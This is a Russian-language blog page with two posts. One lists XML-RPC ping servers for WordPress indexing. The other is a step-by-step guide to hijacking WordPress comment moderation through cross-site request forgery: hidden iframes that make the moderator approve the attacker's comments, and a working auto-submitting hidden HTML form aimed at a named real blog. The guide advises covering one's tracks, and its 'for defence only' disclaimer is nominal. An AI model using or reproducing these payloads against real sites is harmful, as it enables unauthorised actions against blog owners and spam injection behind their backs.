Showing posts with label hack wordpress. Show all posts
Showing posts with label hack wordpress. Show all posts

Friday, March 9, 2007

Надоел pingomatic? Вот так индексировать блог намного лучше и быстрее :)

Касательно WordPress.
Стандартная инсталяция вордпресса сама пингует развалы блогов используя rpc.pingomatic, к сожалению их там не так много. Поэтому рекомендую перейти в административной панели Options>Writing и добавить еще следующий список:

http://rpc.blogrolling.com/pinger/
http://www.bitacoles.net/ping.php
http://rpc.wpkeys.com
http://rpc.technorati.com/rpc/ping
http://rpc.britblog.com
http://pingoat.com/goat/RPC2
http://bulkfeeds.net/rpc
http://rpc.weblogs.com/RPC2
http://api.my.yahoo.com/RPC2
http://services.newsgator.com/ngws/xmlrpcping.aspx
http://api.moreover.com/ping
http://api.moreover.com/RPC2
http://www.blogpeople.net/servlet/weblogUpdates
http://ping.fakapster.com/rpc
http://www.blogoon.net/ping/
http://ping.bloggers.jp/rpc/
http://bblog.com/ping.php
http://rpc.tailrank.com/feedburner/RPC2
http://ping.bitacoras.com
FeedBurner
http://ping.myblog.jp
http://ping.syndic8.com/xmlrpc.php
http://ping.weblogalot.com/rpc.php
http://pinger.blogflux.com/rpc
http://blogsearch.google.com/ping/RPC2
http://blog.goo.ne.jp/XMLRPC
Blogs Trend Tool - IceRocket
http://rpc.pingomatic.com
http://api.feedster.com/ping.php
http://api.moreover.com/RPC2
http://rpc.pingomatic.com/
http://www.bloglines.com/ping
http://ping.feedburner.com
http://rpc.technorati.com/rpc/ping
http://blogsearch.google.com/ping/RPC2
http://api.my.yahoo.com/RPC2
http://rpc.weblogs.com/RPC2
http://ping.weblogalot.com/rpc.php
http://api.feedster.com/ping
http://ping.syndic8.com/xmlrpc.php

Thursday, December 14, 2006

Как взломать комментарии в WordPress

*Примечание: Этот текст можно использовать только для ознакомления и последующей защиты своего блога. По материалам ВанДер Граафа.

Как взломать комментарии в WordPress?
WordPress считается одним из самых защищенных движков, но и он имеет некоторые уязвимости. Я расскажу как с помощью правильной последовательности команд ТВОЙ блог смогут взломать и спокойно добавлять комментарии в без ведома администратора.

1. Найдите блог на движке WordPress где вы хотите поместить комментарий, но модератор вам этого никогда не позволит.

2. Создайте страничку, содержащую некоторую информацию, но с очень маленьким iframe. Оставьте пустым URL для iframe.

3. Найдите где расположен wp-login.php. Обычно он располагается в той же директории что и блог.

4. Введите комментарий, который вы хотите добавить, но не нажимайте кнопку Submit. Посмотрите в тексте страницы id последнего коментария: <li class=”" id=”comment-7″>. Твой комментарий будет содержать следующее значение (в нашем случае 7+1=8). И посмотрите номер post id <div class=”post” id=”post-10″> (в нашем случае 10).

5. Теперь отредактируйте страницу вместе с iframe и установите iframe на:http://(blog directory)/wp-admin/post.php?action=mailapprovecomment&p=10&comment=8

6. Напишите первый комент и потом можно писать коменты с завлекательной ссылкой на ваш блог вместе со скрытыми iframeмами. Ты также можешь ссылку на свою страницу в первом коменте без добавления второго.

7. Прикрой свою задницу удалением iframe.

8. Сделал!? Теперь вступает в дело модератор! (9 и 10 шаги можешь пропустить они слишком эзотерические)

9. Модератор смотрит по своим логам из контрольной панели и начинает резать Твои комментарии.

10. Он смотрит Твои комментарии, как добавленные свои и подсознательно связывает их со своими и одобряет их. Или нет…:)

11. Хочешь добавлять комментарии без ведома модератора?

12. Смотри исходники формы комментария. Найди там action=”". Скопируй URL и посмотри comment_post_ID.

13. Помести этот код на страницу, которую запрашиваешь через iframe.

<HTML>
<BODY>
<form name='f' method='post' action='http://www.mattcutts.com/blog/wp-comments-post.php' style="display:none;"><!-- enter the url -->
<textarea name="comment">ХАХАХАХА</textarea><!-- enter your message -->
<input name="submit" type="text" value="Submit Comment" />
<input type="hidden" name="comment_post_ID" value="215" /><!-- enter the right number -->
<input name='s' type='submit' value='submit' />
</form>
<script>
document.f.s.click();
</script>
</BODY>
</HTML>

Как видишь крякнуть очень легко. Вот и думай теперь что делать со своим блогом и как его защитить от взлома! Хотя почему то мне кажется у Тебя появились другие мысли.

ЗЫ: Что делать? Ответ будет в другом выпуске. )